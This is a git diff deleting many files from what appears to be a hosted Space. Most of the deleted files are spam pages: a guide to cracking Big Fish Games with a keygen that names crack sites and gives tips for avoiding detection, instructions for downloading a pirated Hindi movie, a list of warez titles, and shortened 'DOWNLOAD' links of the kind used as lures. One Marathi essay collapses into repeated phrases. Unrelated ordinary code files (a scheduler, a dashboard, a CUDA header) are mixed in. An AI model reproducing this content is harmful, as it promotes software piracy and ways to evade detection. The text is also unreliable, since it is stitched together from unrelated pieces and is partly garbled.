          -
            -
          • Risk getting infected by malware or viruses. You might download a fake or malicious keygen that can harm your computer or steal your personal information.
          • -
          • Risk getting sued or fined by Big Fish Games. You might face legal consequences if you are caught cracking Big Fish Games with a keygen.
          • -
          • Lose access to updates and support. You might miss out on new features, bug fixes, and customer service that Big Fish Games provides for their games.
          • -
          • Lose respect and integrity as a gamer. You might be seen as a cheater or a thief by other gamers who pay for their games legally.
          • -
          -

          How to Find and Download Big Fish Games Keygen

          -

          If you want to crack Big Fish Games with a keygen, you need to find and download a reliable and working keygen first. There are many websites and forums that claim to offer Big Fish Games keygen, but not all of them are trustworthy or safe. Some of them might contain fake or malicious files that can harm your computer or steal your personal information.

          -

          One of the best sources to find and download Big Fish Games keygen is AppNee Freeware Group. This is a website that provides various software tools and resources for free. They have a dedicated page for Big Fish Games keygen, where you can download the latest version of the keygen that can generate keys for more than 4000 Big Fish games. You can also find a detailed tutorial on how to use the keygen on their website.

          -

          Another good source to find and download Big Fish Games keygen is cs.rin.ru forum. This is a forum that focuses on game cracking and modding. They have a thread for Big Fish Games keygen, where you can download the keygen and a modified game client that can bypass the Big Fish Game Manager. You can also find helpful tips and tricks from other users on how to crack Big Fish Games with the keygen.

          -

          How to Avoid Getting Caught Cracking Big Fish Games

          -

          Cracking Big Fish Games with a keygen is illegal and risky. You might get caught by Big Fish Games or by law enforcement agencies if you are not careful. If you want to avoid getting caught cracking Big Fish Games, you should follow some precautions and best practices. For example, you should:

          -
            -
          • Use a VPN service to hide your IP address and location when downloading or using the keygen. This will prevent Big Fish Games or anyone else from tracking your online activity or identity.
          • -
          • Use an antivirus program to scan the keygen and the modified game client before using them. This will ensure that they are free of malware or viruses that might compromise your security or privacy.
          • -
          • Use a sandbox program to run the keygen and the modified game client in an isolated environment. This will prevent them from accessing or modifying any files or settings on your computer.
          • -
          • Use a disposable email address to register or activate your Big Fish account. This will prevent Big Fish Games from linking your account to your real identity or contacting you.
          • -
          -

          How to Play Cracked Big Fish Games

          -

          After you have cracked Big Fish Games with a keygen, you can play them on your computer without any limitations. However, there are some things you need to know before you start playing. For example, you should:

          -
            -
          • Run the game from the modified game client's .exe file that you copied into the game installation folder. This will bypass the Big Fish Game Manager and run the game as a full version.
          • -
          • Disable your internet connection or firewall when playing cracked Big Fish Games. This will prevent Big Fish Games from detecting your cracked games or sending any data to their servers.
          • -
          • Backup your game progress and settings regularly. You might lose your game data if something goes wrong with your cracked games or your computer.
          • -
          • Do not update your cracked games or install any patches. This might break your cracked games or make them revert to trial versions.
          • -
          -

          How to Support Big Fish Games

          -

          Cracking Big Fish Games with a keygen is not a good way to support Big Fish Games and their developers. If you like their games and appreciate their work, you should buy their games legally and enjoy them with all the benefits and features they offer. By supporting Big Fish Games, you can:

          -
            -
          • Get access to updates and support. You can download the latest versions of their games and get help from their customer service if you encounter any problems.
          • -
          • Get access to exclusive content and offers. You can unlock bonus levels, extra modes, achievements, and rewards that are only available for paid customers.
          • -
          • Get access to more games and genres. You can explore their huge catalog of games and find new ones that match your taste and preference.
          • -
          • Show respect and gratitude to Big Fish Games and their developers. You can give them positive feedback, ratings, reviews, and recommendations that will help them improve their games and create more amazing ones.
          • -
          -

          Conclusion

          -

          In this article, we have shown you how to crack Big Fish Games with a keygen. This is a simple and effective way to enjoy casual games without paying for them. However, we do not encourage piracy or illegal activities. Cracking Big Fish Games with a keygen is illegal and risky. It violates the terms of service and the copyright of Big Fish Games and their developers. It also deprives them of their rightful income and recognition for their hard work and creativity.

          -

          If you want to play Big Fish Games without cracking them with a keygen, you have some alternatives that are legal and safe. You can play the free trial versions, wait for discounts and sales, use coupons and promo codes, or join the Big Fish Game Club. These options will allow you to enjoy Big Fish Games with all the benefits and features they offer.

          -

          If you like Big Fish Games and appreciate their work, you should support them by buying their games legally and enjoying them with all the benefits and features they offer. By supporting Big Fish Games, you can get access to updates and support, exclusive content and offers, more games and genres, and show respect and gratitude to Big Fish Games and their developers.

          -

          We hope this article has been helpful and informative for you. Thank you for reading and happy gaming!

          3cee63e6c2
          -
          -
          \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md b/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md deleted file mode 100644 index 61b55cea6e51e495da649d34aef20c5cba502bb8..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md +++ /dev/null @@ -1,6 +0,0 @@ -

          BulletProof FTP download pc


          DOWNLOAD ✏ ✏ ✏ https://urlin.us/2uEww3



          -
          -Shareware [?] Operating Systems: Windows 2000 Windows XP Windows 2003 Server. Release Status: update (2019 ... 1fdad05405
          -
          -
          -

          diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md deleted file mode 100644 index 1078f05bac65b0061e27ccfea16398c508d95877..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md +++ /dev/null @@ -1,116 +0,0 @@ - -

          How to Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p

          - -

          If you are looking for a comedy movie that will make you laugh out loud, you should check out Kamaal Dhamaal Malamaal. This is a 2012 Hindi movie directed by Priyadarshan and starring Nana Patekar, Shreyas Talpade, Paresh Rawal, Madhurima Banerjee and others. The movie is about Jhonny, a lazy and good-for-nothing man who is often fooled by the villagers. His life changes when a mysterious man named Bakri arrives in the village and claims to be his long-lost brother. Jhonny soon realizes that Bakri is not what he seems and has a hidden agenda. What follows is a series of hilarious events and misunderstandings that will keep you entertained throughout.

          - -

          If you want to watch Kamaal Dhamaal Malamaal, you can download it from various online sources. However, you need to be careful and choose a reliable and safe site that offers high-quality video and audio. You also need to make sure that the file size and format are compatible with your device and player. In this article, we will show you how to download Kamaal Dhamaal Malamaal man movie in Hindi 720p.

          -

          download Kamaal Dhamaal Malamaal man movie in hindi 720p


          Downloadhttps://urlin.us/2uEy3y



          - -

          Why Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          There are many reasons why you should download Kamaal Dhamaal Malamaal man movie in Hindi 720p. Here are some of them:

          - -
            -
          • You can enjoy the movie in high-definition quality with clear picture and sound.
          • -
          • You can save the movie on your device and watch it anytime and anywhere without internet connection.
          • -
          • You can avoid ads, pop-ups and malware that may interrupt your viewing experience or harm your device.
          • -
          • You can share the movie with your friends and family easily.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is easy and fast if you follow the right steps.

          - -

          How to Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          To download Kamaal Dhamaal Malamaal man movie in Hindi 720p, you need to follow these steps:

          - -
            -
          1. Find a trustworthy site that offers Kamaal Dhamaal Malamaal man movie in Hindi 720p. You can use a search engine or a review site to find such sites. Some of the popular sites are SSRMovies, TorrentMoviesInIDM and Askmemetallurgy.
          2. -
          3. Visit the site and search for Kamaal Dhamaal Malamaal man movie in Hindi 720p. You will see a list of results with different file sizes and formats. Choose the one that suits your preferences and click on it.
          4. -
          5. You will be redirected to a download page where you will see a download link or button. Click on it and wait for the download to start. You may need to complete some verification steps or surveys before the download begins.
          6. -
          7. Once the download is complete, you will have the Kamaal Dhamaal Malamaal man movie in Hindi 720p file on your device. You can open it with any compatible media player and enjoy the movie.
          8. -
          - -

          Note: Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p may be illegal in some countries or regions. You should check the laws and regulations of your location before downloading any copyrighted content. You should also use a VPN or proxy service to protect your privacy and security online.

          - -

          Conclusion

          - -

          Kamaal Dhamaal Malamaal is a comedy movie that will make you laugh out loud with its funny plot and characters. You can download Kamaal Dhamaal Malamaal man movie in Hindi 720p from various online sources if you want to watch it in high-quality video and audio. You just need to find a reliable and safe site that offers the movie in the desired file size and format. You also need to follow some simple steps to download the movie on your device. By downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can enjoy the movie anytime and anywhere without any hassle.

          -

          What are the Reviews of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p has received mixed reviews from critics and audiences. Some have praised the movie for its comedy and entertainment value, while others have criticized it for its weak plot and direction. Here are some of the reviews of Kamaal Dhamaal Malamaal man movie in Hindi 720p:

          - -
            -
          • Taran Adarsh of Bollywood Hungama gave the movie 2 out of 5 stars and wrote, "KAMAAL DHAMAAL MALAMAAL is a big letdown from the accomplished director. It's not funny, it's not engaging, it's not entertaining. It's a damp squib!"
          • -
          • Rajeev Masand of CNN-IBN gave the movie 1 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is so dull and humorless that it makes you long for a Priyadarshan comedy like De Dana Dan or Bhagam Bhag. Yes, it's that bad."
          • -
          • Sukanya Verma of Rediff gave the movie 2 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a harmless comedy that doesn't make you laugh much but doesn't annoy you either. It's just there."
          • -
          • Shubhra Gupta of The Indian Express gave the movie 1.5 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a sorry mess, with nothing to recommend it."
          • -
          • Anupama Chopra of Hindustan Times gave the movie 1.5 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a film that makes you wonder why it was made. It's not funny or engaging or remotely interesting."
          • -
          - -

          As you can see, Kamaal Dhamaal Malamaal man movie in Hindi 720p has not received much appreciation from the critics or the viewers. However, if you are a fan of Priyadarshan or Nana Patekar, you may still enjoy the movie for its comedy scenes and dialogues.

          - -

          How to Watch Kamaal Dhamaal Malamaal Man Movie in Hindi 720p Online?

          - -

          If you don't want to download Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can also watch it online on various streaming platforms. However, you need to have a good internet connection and a subscription to access these platforms. You also need to be careful of illegal or pirated sites that may harm your device or expose your personal information.

          -

          - -

          Some of the legal and safe platforms where you can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online are:

          - -
            -
          • Amazon Prime Video: This is a popular streaming service that offers a wide range of movies and shows in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Amazon Prime Video with a monthly or yearly subscription.
          • -
          • Hotstar: This is another popular streaming service that offers movies, shows, sports and news in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Hotstar with a monthly or yearly subscription.
          • -
          • Zee5: This is a streaming service that offers movies, shows, music and live TV in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Zee5 with a monthly or yearly subscription.
          • -
          - -

          By watching Kamaal Dhamaal Malamaal man movie in Hindi 720p online, you can enjoy the movie without any hassle or risk.

          -

          What is the Plot of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p is a comedy movie that revolves around the life of Jhonny, a lazy and good-for-nothing man who lives in a village with his father Peter. Jhonny is often fooled by the villagers as he is fit for nothing. He is in love with Maria, the daughter of the village headman David, but he has no courage to propose to her. His life changes when a mysterious man named Bakri arrives in the village and claims to be his long-lost brother. Bakri is a smart and strong man who impresses everyone with his skills and abilities. He also helps Jhonny to win Maria's heart and to stand up against the villagers. However, Jhonny soon realizes that Bakri is not what he seems and has a hidden agenda. He is actually a wanted criminal who has come to the village to hide from his enemies and to loot the villagers. Jhonny has to decide whether to support his brother or to expose his truth.

          - -

          Who are the Cast and Crew of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p is directed by Priyadarshan, who is a famous filmmaker known for his comedy movies such as Hera Pheri, Hungama, Bhool Bhulaiyaa and others. The movie is written by Neeraj Vora, who is also a renowned writer and actor. The movie is produced by Percept Picture Company and features a star-studded cast of actors such as:

          - -
            -
          • Nana Patekar as Bakri: He is the main protagonist of the movie who plays the role of Jhonny's brother and a wanted criminal.
          • -
          • Shreyas Talpade as Jhonny: He is the main antagonist of the movie who plays the role of Bakri's brother and a lazy and good-for-nothing man.
          • -
          • Paresh Rawal as Peter: He is Jhonny's father who is also a lazy and good-for-nothing man.
          • -
          • Madhurima Banerjee as Maria: She is Jhonny's love interest and David's daughter.
          • -
          • Om Puri as David: He is Maria's father and the village headman.
          • -
          • Asrani as Kallu: He is Jhonny's friend who is also a lazy and good-for-nothing man.
          • -
          • Shakti Kapoor as Sam: He is Bakri's enemy who wants to kill him.
          • -
          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p also features other actors such as Anjana Sukhani, Neeraj Vora, Rajpal Yadav, Pratima Kazmi and others in supporting roles.

          -

          What are the Benefits of Downloading Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p has many benefits that you can enjoy. Here are some of them:

          - -
            -
          • You can save money and time by downloading the movie instead of buying or renting it from a store or an online platform.
          • -
          • You can watch the movie at your own convenience and comfort without any interruptions or distractions.
          • -
          • You can choose the quality and format of the movie according to your device and player specifications.
          • -
          • You can have a backup of the movie on your device in case you lose or damage the original source.
          • -
          • You can share the movie with your friends and family easily by transferring it to their devices or using a USB drive or a cloud service.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is a smart and easy way to enjoy this comedy movie.

          - -

          What are the Risks of Downloading Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p also has some risks that you should be aware of. Here are some of them:

          - -
            -
          • You may violate the copyright laws and regulations of your country or region by downloading the movie without permission or authorization from the owners or creators.
          • -
          • You may face legal actions or penalties such as fines, lawsuits or imprisonment for downloading the movie illegally.
          • -
          • You may harm your device or expose your personal information by downloading the movie from untrustworthy or malicious sites that may contain viruses, malware or spyware.
          • -
          • You may compromise your privacy and security by downloading the movie without using a VPN or proxy service that can hide your IP address and encrypt your data.
          • -
          • You may get low-quality or corrupted files that may not play properly or damage your device or player.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is a risky and dangerous activity that you should avoid or minimize.

          -

          Conclusion

          - -

          Kamaal Dhamaal Malamaal is a comedy movie that will make you laugh out loud with its funny plot and characters. You can download Kamaal Dhamaal Malamaal man movie in Hindi 720p from various online sources if you want to watch it in high-quality video and audio. You just need to find a reliable and safe site that offers the movie in the desired file size and format. You also need to follow some simple steps to download the movie on your device. However, you should also be careful of the risks and consequences of downloading the movie illegally or from untrustworthy sites. You should always respect the rights and efforts of the owners and creators of the movie and use a VPN or proxy service to protect your privacy and security online. By downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can enjoy this comedy movie anytime and anywhere without any hassle or risk.

          3cee63e6c2
          -
          -
          \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md deleted file mode 100644 index 6676fedb06da16fb5445d0f96bd4d0222437995a..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md +++ /dev/null @@ -1,6 +0,0 @@ -

          icad sx mechanical pro crack


          DOWNLOADhttps://urlin.us/2uExuU



          -
          -Latest crack software ftp download can mail to ***@list.ru. Latest crack ... Pro.v8.2. Nikon Capture NX 2. NIST.EPA.NIH.Mass.Spectral.Library.05.and.AMDIS.iSO ... ICAD/SX.Mechanical.V6L1 ICCV7 for AVR v7.19. ICAM.CAMPost.v18. ICAM. 1fdad05405
          -
          -
          -

          diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md deleted file mode 100644 index 646d67c246beec898b3e8d99e7b599b316bbb0ba..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md +++ /dev/null @@ -1,13 +0,0 @@ - -

          माझी शाळा निबंध मराठी | Majhi Shala Nibandh (400 शब्द)

          -

          माझ्या शाळेचे नाव कस्तुरबा माध्यमिक विद्यालय आहे. माझी शाळा साताऱ्यात आहे, शाळेच्या खूप मोठ्या परिसरात. शाळेची इमारत ३ मजली आहे. प्रत्येक मजल्यावर ८ वर्गखोल्या आहेत. शाळेत १००० पेक्षा जास्त विद्यार्थी शिकत असतात. माझी शाळा मुख्यरूपे हिंदी माध्यमीची आहे, पण मराठी, उर्दू, संस्कृत, इंग्रजी हे पण संकलनप्रक्रिया आहेत.

          -

          mazi shala marathi nibandh pdf 38


          Download Zip ===> https://urlin.us/2uEyK0



          -

          माझी शाळा मला केवळ पुस्तके वाचणे किंवा परीक्षेमध्ये सर्वोत्कृष्ट करणे हे संपूर्ण कुसलते समजतो. मला हे सुद्धा समजतो कि मला कसे समुपदेशन करावे, कसे संस्कृतीने संपर्क करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे. मला हि सर्व गोष्टी माझी शाळा मुळे मिळतील हि मला पूर्णपणे प्रतिबंधित होतो.

          -

          मला मनोरंजन होतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळ - -

          माझी शाळा मला केवळ पुस्तके वाचणे किंवा परीक्षेमध्ये सर्वोत्कृष्ट करणे हे संपूर्ण कुसलते समजतो. मला हे सुद्धा समजतो कि मला कसे समुपदेशन करावे, कसे संस्कृतीने संपर्क करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे. मला हि सर्व गोष्टी माझी शाळा मुळे मिळतील हि मला पूर्णपणे प्रतिबंधित होतो.

          -

          मला मनोरंजन होतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला गाणी गायला, नृत्य करण्यास, चित्रकलेत आपली भाषा बोलण्यास आणि लेखन करण्यास मिळतो. मला शाळेतील अनेक स्पर्धांमध्ये भाग घेण्याची परवानगी मिळते. मला शिक्षक-विद्यार्थी-पालक-संपर्क-संस्था (SSP) ची सभा आणि शिक्षक-विद्यार्थी-प्रतिनिधी-संस्था (SSR) ची सभा आणि शिक्षक-विद्यार्थी-प्रतिनिधी-संस्था (SSR) ची सभा हि मनोरंजनाची होती. मला हि सर्व गोष्टी मनोरंजनाची होती.

          -

          मला प्रेम होतो. मला माझी शाळा प्रेम होत. मला माझे शिक्षक प्रेम होत. मला माझे मित्र प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तक

          -

          d5da3c52bf
          -
          -
          \ No newline at end of file diff --git a/spaces/ismot/1702t1/models/other/scheduler.py b/spaces/ismot/1702t1/models/other/scheduler.py deleted file mode 100644 index 27d93bc4a6f72059d5e00e6589bc1715f5452aab..0000000000000000000000000000000000000000 --- a/spaces/ismot/1702t1/models/other/scheduler.py +++ /dev/null @@ -1,51 +0,0 @@ -""" -@Date: 2021/09/14 -@description: -""" - - -class WarmupScheduler: - def __init__(self, optimizer, lr_pow, init_lr, warmup_lr, warmup_step, max_step, **kwargs): - self.lr_pow = lr_pow - self.init_lr = init_lr - self.running_lr = init_lr - self.warmup_lr = warmup_lr - self.warmup_step = warmup_step - self.max_step = max_step - self.optimizer = optimizer - - def step_update(self, cur_step): - if cur_step < self.warmup_step: - frac = cur_step / self.warmup_step - step = self.warmup_lr - self.init_lr - self.running_lr = self.init_lr + step * frac - else: - frac = (float(cur_step) - self.warmup_step) / (self.max_step - self.warmup_step) - scale_running_lr = max((1. - frac), 0.) ** self.lr_pow - self.running_lr = self.warmup_lr * scale_running_lr - - if self.optimizer is not None: - for param_group in self.optimizer.param_groups: - param_group['lr'] = self.running_lr - - -if __name__ == '__main__': - import matplotlib.pyplot as plt - - scheduler = WarmupScheduler(optimizer=None, - lr_pow=4, - init_lr=0.0000003, - warmup_lr=0.00003, - warmup_step=10000, - max_step=100000) - - x = [] - y = [] - for i in range(100000): - if i == 10000-1: - print() - scheduler.step_update(i) - x.append(i) - y.append(scheduler.running_lr) - plt.plot(x, y, linewidth=1) - plt.show() diff --git a/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py b/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py deleted file mode 100644 index e4d359ff14625ad1336139d8667f36bac3e7249f..0000000000000000000000000000000000000000 --- a/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py +++ /dev/null @@ -1,126 +0,0 @@ -import holoviews as hv -import panel as pn -from graphs.bar_plots import get_top5_langs -from graphs.hashtags_plot import get_top10_hashtags -from graphs.line_plots import get_daily_tweets, get_daily_unique_users -from graphs.sentiment_plots import get_overall_sentiment -from graphs.tweet_map import get_tweet_map, get_tweet_points -from holoviews import streams -from pd_utils.utils import filter_df_by_bbox, get_hashtags_df, load_data - -# Load the bokeh extension -hv.extension("bokeh") - -# Disable webgl: https://github.com/holoviz/panel/issues/4855 -hv.renderer("bokeh").webgl = False # Disable Webgl - -pn.extension("echarts", notifications=True) - - -def show_nodata_message(x_range, y_range): - """ - Displays a notification if no data is found - """ - - out_data = filter_df_by_bbox(twitter_data, x_range, y_range) - if len(out_data) == 0: - # FIXME: Notifications are not working - # pn.state.notifications.warning("No data to display 🙁", duration=4000) - pass - - -# Twitter logo -TWITTER_LOGO = "https://huggingface.co/spaces/ivn888/Twitter-dashboard/resolve/main/panel-geodashboard-twitter/assets/images/Twitter-logo.svg" - -# Input Twitter data -IN_TWITTER_DATA = "https://huggingface.co/spaces/ivn888/Twitter-dashboard/resolve/main/panel-geodashboard-twitter/data/rome_tweets.parquet" - - -# Load tweet locations and hashtags as a DataFrame -twitter_data = load_data(IN_TWITTER_DATA) - -# Load tweet hashtags as a DataFrame -hashtags_data = get_hashtags_df(twitter_data) - -# Get a rasterized point 
plot showing the tweet locations -tweets_pts = get_tweet_points(twitter_data) - -# Define a RangeXY stream linked to the tweet locations -range_xy = streams.RangeXY(source=tweets_pts) -range_xy.add_subscriber(show_nodata_message) - -# Get the tweet map -tweet_map = get_tweet_map(tweets_pts) - -# Top 5 languages -top5_languages = hv.DynamicMap( - pn.bind( - get_top5_langs, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Overall Sentiment -overall_sentiment = pn.bind( - get_overall_sentiment, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, -) - -# Top 10 hashtags - wordcloud image -top10_hashtags = pn.bind( - get_top10_hashtags, - in_data=hashtags_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, -) - -# Number of tweets (daily) -tweets_daily = hv.DynamicMap( - pn.bind( - get_daily_tweets, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Number of unique users (daily) -unique_users_daily = hv.DynamicMap( - pn.bind( - get_daily_unique_users, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Second tab - Top 5 Languages, Top 10 Hashtags -top5_10_tabs = pn.Tabs( - ("Top 5 Languages", top5_languages), - ("Top 10 Hashtags", top10_hashtags), - ("Overall sentiment", overall_sentiment), -) - -# Third tab - Daily data (Tweets, Unique users) -daily_plots_tabs = pn.Tabs( - ("Tweets", tweets_daily), - ("Unique Users", unique_users_daily), -) - -# Compose the layout -layout = pn.Column(pn.Row(tweet_map, top5_10_tabs), daily_plots_tabs) - -# Create the dashboard and turn into a deployable application -twitter_geodashboad = pn.template.FastListTemplate( - site="", - title="Twitter Dashboard - Rome (2018)", - theme="dark", - theme_toggle=False, - logo=TWITTER_LOGO, - main=[layout], - modal=[pn.Row()], -).servable() diff --git a/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h b/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h deleted file mode 100644 index 2793daf874492af01e8634a7863c036e17b6731f..0000000000000000000000000000000000000000 --- a/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h +++ /dev/null @@ -1,59 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include - -//------------------------------------------------------------------------ -// CUDA kernel parameters. - -struct upfirdn2d_kernel_params -{ - const void* x; - const float* f; - void* y; - - int2 up; - int2 down; - int2 pad0; - int flip; - float gain; - - int4 inSize; // [width, height, channel, batch] - int4 inStride; - int2 filterSize; // [width, height] - int2 filterStride; - int4 outSize; // [width, height, channel, batch] - int4 outStride; - int sizeMinor; - int sizeMajor; - - int loopMinor; - int loopMajor; - int loopX; - int launchMinor; - int launchMajor; -}; - -//------------------------------------------------------------------------ -// CUDA kernel specialization. 
- -struct upfirdn2d_kernel_spec -{ - void* kernel; - int tileOutW; - int tileOutH; - int loopMinor; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template upfirdn2d_kernel_spec choose_upfirdn2d_kernel(const upfirdn2d_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/jason9693/Soongsil-Bot-KoGPT/README.md b/spaces/jason9693/Soongsil-Bot-KoGPT/README.md deleted file mode 100644 index d5ba744c71ac757bc28cf1f76b003848a1ac8a13..0000000000000000000000000000000000000000 --- a/spaces/jason9693/Soongsil-Bot-KoGPT/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Soongsil Bot KoGPT -emoji: 🏃 -colorFrom: purple -colorTo: purple -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py b/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py deleted file mode 100644 index ca6ef9385e3b5c0a439579d3fd7aa73b5dc62758..0000000000000000000000000000000000000000 --- a/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py +++ /dev/null @@ -1,41 +0,0 @@ -import torch -from torch.autograd import Variable -import numpy as np -import collections - -__all__ = ['as_variable', 'as_numpy', 'mark_volatile'] - -def as_variable(obj): - if isinstance(obj, Variable): - return obj - if isinstance(obj, collections.Sequence): - return [as_variable(v) for v in obj] - elif isinstance(obj, collections.Mapping): - return {k: as_variable(v) for k, v in obj.items()} - else: - return Variable(obj) - -def as_numpy(obj): - if isinstance(obj, collections.Sequence): - return [as_numpy(v) for v in obj] - elif isinstance(obj, collections.Mapping): - return {k: as_numpy(v) for k, v in obj.items()} - elif isinstance(obj, Variable): - return obj.data.cpu().numpy() - elif torch.is_tensor(obj): - return obj.cpu().numpy() - else: - return np.array(obj) - -def mark_volatile(obj): - if torch.is_tensor(obj): - obj = Variable(obj) - if isinstance(obj, Variable): - obj.no_grad = True - return obj - elif isinstance(obj, collections.Mapping): - return {k: mark_volatile(o) for k, o in obj.items()} - elif isinstance(obj, collections.Sequence): - return [mark_volatile(o) for o in obj] - else: - return obj diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py deleted file mode 100644 index c0a13b7555efc9d99c5c887fee1c94c88ba7e89c..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py +++ 
